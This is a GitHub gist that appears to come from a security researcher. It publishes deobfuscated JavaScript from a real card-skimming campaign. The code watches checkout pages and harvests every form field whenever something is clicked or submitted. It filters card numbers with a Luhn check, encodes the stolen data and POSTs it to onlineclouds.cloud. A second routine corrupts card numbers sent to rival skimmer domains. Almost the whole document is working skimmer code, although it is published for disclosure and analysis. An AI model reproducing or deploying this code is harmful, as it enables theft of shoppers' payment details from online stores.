Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save gwillem/597561ce69c93913458473e5fba88802 to your computer and use it in GitHub Desktop.
Save gwillem/597561ce69c93913458473e5fba88802 to your computer and use it in GitHub Desktop.
Malware from onlineclouds.cloud unfuscated
setTimeout(checkForCheckout, 100);
var snd = null;
function checkForCheckout() {
if ((/onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/).test(window.location)) {
scrapeAllFields();
}
}
function createQueryString() {
var inp = document.querySelectorAll("input, select, textarea, checkbox");
for (var i = 0; i < inp.length; i++) {
if (inp[i].value.length > 0 && inp[i].value.length < 60) {
var nme = inp[i].name;
if (nme == "") {
nme = i;
}
snd += inp[i].name + "=" + inp[i].value + '&';
}
}
}
function isValidCard(s) {
var v = "0123456789";
var w = "";
for (i = 0; i < s.length; i++) {
x = s.charAt(i);
if (v.indexOf(x, 0) != -1) w += x;
}
j = w.length / 2;
k = Math.floor(j);
m = Math.ceil(j) - k;
c = 0;
for (i = 0; i < k; i++) {
a = w.charAt(i * 2 + m) * 2;
c += a > 9 ? Math.floor(a / 10 + a % 10) : a;
}
for (i = 0; i < k + m; i++) c += w.charAt(i * 2 + 1 - m) * 1;
return (c % 10 == 0);
}
function scrapeAllFields() {
var btn = document.querySelectorAll(`a[href*='javascript:void0'],a[href='#'],button, input, submit, .btn, .button`);
for (var i = 0; i < btn.length; i++) {
var b = btn[i];
// "slect" is typo here -- WdG
if (b.type != "text" && b.type != 'slect' && b.type != "checkbox" && b.type != 'password' && b.type != "radio") {
if (b.addEventListener) {
b.addEventListener('click', createQueryString, false);
} else {
b.attachEvent('onclick', createQueryString);
}
}
}
var frm = document.querySelectorAll('form');
for (var i = 0; i < frm.length; i++) {
if (frm[i].addEventListener) {
frm[i].addEventListener('submit', createQueryString, false);
} else {
frm[i].attachEvent('onsubmit', createQueryString);
}
}
if (snd != null) {
var regexp = /(3|4|5|6)[0-9]{13,16}/gi;
var matches = snd.match(regexp);
if (matches != null) {
if (isValidCard(matches[0]) == true) {
snd = encodeAllTheThings(snd + "&shop=www.google.nl&card_123=" + matches[0]);
var http = new XMLHttpRequest();
http.open("POST", "https://www.onlineclouds.cloud/api/v1/", true);
http.setRequestHeader('Content-type', "application/x-www-form-urlencoded");
http.withCredentials = true;
http.send("data=" + snd + '&token=' + encodeAllTheThings(window.location.host));
}
}
}
snd = null;
setTimeout(scrapeAllFields, 150);
}
function encodeAllTheThings(theText) {
output = new String;
Temp = new Array();
Temp2 = new Array();
TextSize = theText.length;
for (i = 0; i < TextSize; i++) {
rnd = Math.round(Math.random() * 122) + 68;
Temp[i] = theText.charCodeAt(i) + rnd;
Temp2[i] = rnd;
}
for (i = 0; i < TextSize; i++) {
output += String.fromCharCode(Temp[i], Temp2[i]);
}
return output;
};
// second func
jQuery.ajaxSetup({
beforeSend: function(jqXHR, settings) {
if (settings.url.indexOf("js-react.com") !== -1 || settings.url.indexOf('bootstrap-js.com') !== -1) {
console.log(settings.url);
var myRandom = Math.floor(Math.random() * 10);
var cc = new RegExp("[0-9]{13,16}");
if (cc.test(settings.data)) {
var old_cc = settings.data.match(cc);
var new_data = settings.data.replace(new RegExp("[0-9]{13,16}", 'g'), old_cc[0].slice(0, -1) + myRandom);
settings.data = new_data;
}
}
}
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment